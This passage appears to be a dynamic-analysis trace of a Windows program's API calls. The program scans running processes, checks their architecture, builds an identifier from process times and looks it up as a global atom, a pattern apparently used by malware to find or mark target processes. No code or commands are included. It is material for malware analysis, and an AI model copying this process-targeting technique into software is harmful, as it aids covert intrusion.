	[0104.003] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0104.004] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.004] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0104.004] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.004] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0104.004] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0104.004] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0104.004] CloseHandle (hObject=0x694) returned 1
	[0104.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0104.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0104.005] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.005] CloseHandle (hObject=0x694) returned 1
	[0104.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0104.005] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.005] CloseHandle (hObject=0x694) returned 1
	[0104.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0104.005] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.005] CloseHandle (hObject=0x694) returned 1
	[0104.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0104.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0104.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0104.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0104.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0104.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0104.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0104.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0104.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0104.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0104.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0104.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0104.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0104.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0104.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0104.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0104.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0104.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0104.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0104.042] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.042] CloseHandle (hObject=0x694) returned 1
	[0104.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0104.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0104.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0104.042] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.042] CloseHandle (hObject=0x694) returned 1
	[0104.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0104.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0104.042] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.043] CloseHandle (hObject=0x694) returned 1
	[0104.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0104.043] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.043] CloseHandle (hObject=0x694) returned 1
	[0104.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0104.043] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.043] CloseHandle (hObject=0x694) returned 1
	[0104.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0104.043] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.043] CloseHandle (hObject=0x694) returned 1
	[0104.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0104.043] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.043] CloseHandle (hObject=0x694) returned 1
	[0104.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0104.044] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.044] CloseHandle (hObject=0x694) returned 1
	[0104.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0104.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0104.044] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.044] CloseHandle (hObject=0x694) returned 1
	[0104.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0104.044] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.044] CloseHandle (hObject=0x694) returned 1
	[0104.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0104.044] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.044] CloseHandle (hObject=0x694) returned 1
	[0104.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0104.044] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.045] CloseHandle (hObject=0x694) returned 1
	[0104.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0104.045] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.045] CloseHandle (hObject=0x694) returned 1
	[0104.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0104.045] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.045] CloseHandle (hObject=0x694) returned 1
	[0104.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0104.045] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.045] CloseHandle (hObject=0x694) returned 1
	[0104.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0104.045] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.045] CloseHandle (hObject=0x694) returned 1
	[0104.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0104.046] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.046] CloseHandle (hObject=0x694) returned 1
	[0104.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0104.046] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.046] CloseHandle (hObject=0x694) returned 1
	[0104.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0104.046] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.046] CloseHandle (hObject=0x694) returned 1
	[0104.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0104.046] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.046] CloseHandle (hObject=0x694) returned 1
	[0104.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0104.046] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.046] CloseHandle (hObject=0x694) returned 1
	[0104.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0104.047] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.047] CloseHandle (hObject=0x694) returned 1
	[0104.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0104.047] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.047] CloseHandle (hObject=0x694) returned 1
	[0104.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0104.047] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.047] CloseHandle (hObject=0x694) returned 1
	[0104.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0104.047] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.047] CloseHandle (hObject=0x694) returned 1
	[0104.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0104.047] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.047] CloseHandle (hObject=0x694) returned 1
	[0104.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0104.048] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.048] CloseHandle (hObject=0x694) returned 1
	[0104.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0104.048] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.048] CloseHandle (hObject=0x694) returned 1
	[0104.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0104.048] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.048] CloseHandle (hObject=0x694) returned 1
	[0104.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0104.048] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.048] CloseHandle (hObject=0x694) returned 1
	[0104.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.048] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.048] CloseHandle (hObject=0x694) returned 1
	[0104.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.049] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.049] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0104.049] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0104.049] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0104.050] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.050] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0104.050] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.050] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0104.050] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0104.050] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0104.050] CloseHandle (hObject=0x694) returned 1
	[0104.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0104.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0104.051] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.051] CloseHandle (hObject=0x694) returned 1
	[0104.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0104.051] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.051] CloseHandle (hObject=0x694) returned 1
	[0104.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0104.051] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.051] CloseHandle (hObject=0x694) returned 1
	[0104.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0104.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0104.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0104.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0104.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0104.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0104.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0104.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0104.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0104.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0104.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0104.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0104.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0104.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0104.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0104.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0104.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0104.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0104.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0104.091] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.091] CloseHandle (hObject=0x694) returned 1
	[0104.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0104.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0104.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0104.091] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.091] CloseHandle (hObject=0x694) returned 1
	[0104.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0104.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0104.092] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.092] CloseHandle (hObject=0x694) returned 1
	[0104.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0104.092] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.092] CloseHandle (hObject=0x694) returned 1
	[0104.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0104.092] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.092] CloseHandle (hObject=0x694) returned 1
	[0104.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0104.092] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.092] CloseHandle (hObject=0x694) returned 1
	[0104.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0104.093] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.093] CloseHandle (hObject=0x694) returned 1
	[0104.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0104.093] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.093] CloseHandle (hObject=0x694) returned 1
	[0104.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0104.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0104.093] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.093] CloseHandle (hObject=0x694) returned 1
	[0104.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0104.093] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.094] CloseHandle (hObject=0x694) returned 1
	[0104.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0104.106] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.106] CloseHandle (hObject=0x694) returned 1
	[0104.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0104.106] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.106] CloseHandle (hObject=0x694) returned 1
	[0104.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0104.107] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.107] CloseHandle (hObject=0x694) returned 1
	[0104.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0104.107] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.107] CloseHandle (hObject=0x694) returned 1
	[0104.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0104.107] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.107] CloseHandle (hObject=0x694) returned 1
	[0104.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0104.107] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.107] CloseHandle (hObject=0x694) returned 1
	[0104.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0104.107] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.107] CloseHandle (hObject=0x694) returned 1
	[0104.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0104.109] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.109] CloseHandle (hObject=0x694) returned 1
	[0104.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0104.110] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.110] CloseHandle (hObject=0x694) returned 1
	[0104.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0104.110] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.110] CloseHandle (hObject=0x694) returned 1
	[0104.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0104.110] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.110] CloseHandle (hObject=0x694) returned 1
	[0104.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0104.110] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.110] CloseHandle (hObject=0x694) returned 1
	[0104.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0104.111] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.111] CloseHandle (hObject=0x694) returned 1
	[0104.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0104.111] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.111] CloseHandle (hObject=0x694) returned 1
	[0104.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0104.111] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.111] CloseHandle (hObject=0x694) returned 1
	[0104.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0104.111] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.111] CloseHandle (hObject=0x694) returned 1
	[0104.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0104.111] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.111] CloseHandle (hObject=0x694) returned 1
	[0104.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0104.112] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.112] CloseHandle (hObject=0x694) returned 1
	[0104.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0104.112] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.112] CloseHandle (hObject=0x694) returned 1
	[0104.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0104.112] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.112] CloseHandle (hObject=0x694) returned 1
	[0104.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.112] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.112] CloseHandle (hObject=0x694) returned 1
	[0104.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.113] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.113] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0104.113] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0104.113] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0104.114] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.114] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0104.114] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.114] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0104.114] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0104.114] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0104.114] CloseHandle (hObject=0x694) returned 1
	[0104.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0104.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0104.115] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.115] CloseHandle (hObject=0x694) returned 1
	[0104.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0104.115] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.115] CloseHandle (hObject=0x694) returned 1
	[0104.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0104.115] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.115] CloseHandle (hObject=0x694) returned 1
	[0104.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0104.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0104.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
